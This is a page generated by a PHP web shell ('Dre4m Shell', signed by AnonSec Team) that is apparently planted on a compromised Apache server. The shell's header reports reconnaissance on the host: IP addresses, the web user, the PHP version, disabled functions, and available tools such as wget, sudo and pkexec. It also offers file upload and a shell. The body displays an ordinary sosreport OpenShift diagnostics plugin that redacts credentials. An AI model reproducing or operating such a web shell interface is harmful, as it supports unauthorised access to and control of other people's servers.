Dre4m Was Here

Dre4m Shell

Server IP : 127.0.0.2 / Your IP : 3.148.217.66
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /usr/share/sosreport/sos/plugins/

Upload File :

[ HOME SHELL ]

Current File : /usr/share/sosreport/sos/plugins/openshift.py

# This file is part of the sos project: https://github.com/sosreport/sos
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# version 2 of the GNU General Public License.
#
# See the LICENSE file in the source distribution for further information.

from sos.plugins import Plugin, RedHatPlugin
import os.path


# This plugin handles OpenShift Enterprise versions up to 2.x
# which are based in the upstream code of OpenShift Origin M4
# located here: https://github.com/openshift/origin-server
#
# For later of OpenShift Origin based on: https://github.com/openshift/origin
# like OpenShift Enterprise 3.x see the origin.py plugin
class Openshift(Plugin, RedHatPlugin):
    """Openshift 2.x node and broker"""

    plugin_name = "openshift"
    profiles = ('virt', 'openshift')

    # The 'broker' and 'node' options are obsolete but are maintained
    # here for compatibility with external programs that call sosreport
    # with these names.
    option_list = [("broker", "Gathers broker specific files", "slow", False),
                   ("node", "Gathers node specific files", "slow", False)]

    ruby = "ruby193"
    vendor = "rh"
    mco_config_dir = "/opt/%s/%s/root/etc/mcollective" % (vendor, ruby)

    gear_base_dir = "/var/lib/openshift"
    node_settings_dir = os.path.join(gear_base_dir, ".settings")
    node_proxy_dir = os.path.join(gear_base_dir, ".httpd.d")
    httpd_config_dir = "/etc/httpd/conf.d"

    def is_broker(self):
        return os.path.exists("/etc/openshift/broker.conf")

    def is_node(self):
        return os.path.exists("/etc/openshift/node.conf")

    def setup(self):
        self.add_copy_spec([
            "/etc/openshift-enterprise-release",
            "/var/log/openshift",
            "/etc/openshift/*.conf",
            "/etc/openshift/upgrade",
        ])

        self.add_cmd_output("oo-diagnostics -v")

        if self.is_broker():
            self.add_copy_spec([
                "/etc/openshift/quickstarts.json",
                "/etc/openshift/plugins.d/*.conf",
                os.path.join(self.mco_config_dir, "client.cfg"),
                "/var/www/openshift/broker/httpd/httpd.conf",
                "/var/www/openshift/broker/httpd/conf.d/*.conf",
                "/var/www/openshift/console/httpd/httpd.conf",
                "/var/www/openshift/console/httpd/conf.d/*.conf",
            ])

            self.add_cmd_output([
                "oo-accept-broker -v",
                "oo-admin-chk -v",
                "oo-mco ping",
            ])

        if self.is_node():
            self.add_copy_spec([
                "/etc/openshift/node-plugins.d/*.conf",
                "/etc/openshift/cart.conf.d",
                "/etc/openshift/iptables.*.rules",
                "/etc/openshift/env",
                os.path.join(self.httpd_config_dir,
                             "openshift-vhost-logconf.include"),
                os.path.join(self.httpd_config_dir,
                             "openshift-http-vhost.include"),
                os.path.join(self.httpd_config_dir,
                             "openshift_restorer.include"),
                os.path.join(self.mco_config_dir, "server.cfg"),
                os.path.join(self.mco_config_dir, "facts.yaml"),
                os.path.join(self.node_settings_dir, "district.info"),
                os.path.join(self.node_proxy_dir, "*.conf"),
                os.path.join(self.node_proxy_dir, "aliases.txt"),
                os.path.join(self.node_proxy_dir, "nodes.txt"),
                os.path.join(self.node_proxy_dir, "idler.txt"),
                os.path.join(self.node_proxy_dir, "sts.txt"),
                os.path.join(self.node_proxy_dir, "routes.json"),
                os.path.join(self.node_proxy_dir, "geardb.json"),
                os.path.join(self.node_proxy_dir, "sniproxy.json"),
                "/var/log/httpd/openshift_log",
                "/var/log/mcollective.log",
                "/var/log/node-web-proxy/access.log",
                "/var/log/node-web-proxy/error.log",
                "/var/log/node-web-proxy/websockets.log",
                "/var/log/node-web-proxy/supervisor.log",
            ])

            self.add_cmd_output([
                "oo-accept-node -v",
                "oo-admin-ctl-gears list",
                "ls -laZ %s" % self.gear_base_dir,
                "ls -la %s" % self.node_proxy_dir
            ])

    def postproc(self):
        # Redact broker's MongoDB credentials:
        # MONGO_PASSWORD="PasswordForOpenshiftUser"
        self.do_file_sub('/etc/openshift/broker.conf',
                         r"(MONGO_PASSWORD\s*=\s*)(.*)",
                         r"\1*******")

        # Redact session SHA keys:
        # SESSION_SECRET=0c31...a7c8
        self.do_file_sub('/etc/openshift/broker.conf',
                         r"(SESSION_SECRET\s*=\s*)(.*)",
                         r"\1*******")
        self.do_file_sub('/etc/openshift/console.conf',
                         r"(SESSION_SECRET\s*=\s*)(.*)",
                         r"\1*******")

        # Redact passwords of the form:
        # plugin.activemq.pool.1.password = Pa$sW0Rd
        self.do_file_sub(os.path.join(self.mco_config_dir, "server.cfg"),
                         r"(.*password\s*=\s*)\S+",
                         r"\1********")
        self.do_file_sub(os.path.join(self.mco_config_dir, "client.cfg"),
                         r"(.*password\s*=\s*)\S+",
                         r"\1********")

        # Redact DNS plugin credentials
        # Dynect DNS: DYNECT_PASSWORD=s0ME-p4$_w0RD._
        plugin_dir = '/etc/openshift/plugins.d/'
        self.do_file_sub(plugin_dir + 'openshift-origin-dns-dynect.conf',
                         r"(DYNECT_PASSWORD\s*=\s*)(.*)",
                         r"\1********")
        # Fog cloud: FOG_RACKSPACE_API_KEY="apikey"
        self.do_file_sub(plugin_dir + 'openshift-origin-dns-fog.conf',
                         r"(FOG_RACKSPACE_API_KEY\s*=\s*)(.*)",
                         r"\1********")
        # ISC bind: BIND_KEYVALUE="rndc key"
        self.do_file_sub(plugin_dir + 'openshift-origin-dns-nsupdate.conf',
                         r"(BIND_KEYVALUE\s*=\s*)(.*)",
                         r"\1********")
        # LDAP authentication:  AuthLDAPBindPassword "IShouldNotBeHere"
        ldap_paths = '/var/www/openshift/(broker|console)/httpd/conf.d/.*'
        self.do_path_regex_sub(ldap_paths,
                               r"(AuthLDAPBindPassword)\s*(.*)",
                               r"\1********")

# vim: set et ts=4 sw=4 :

Anon7 - 2022
AnonSec Team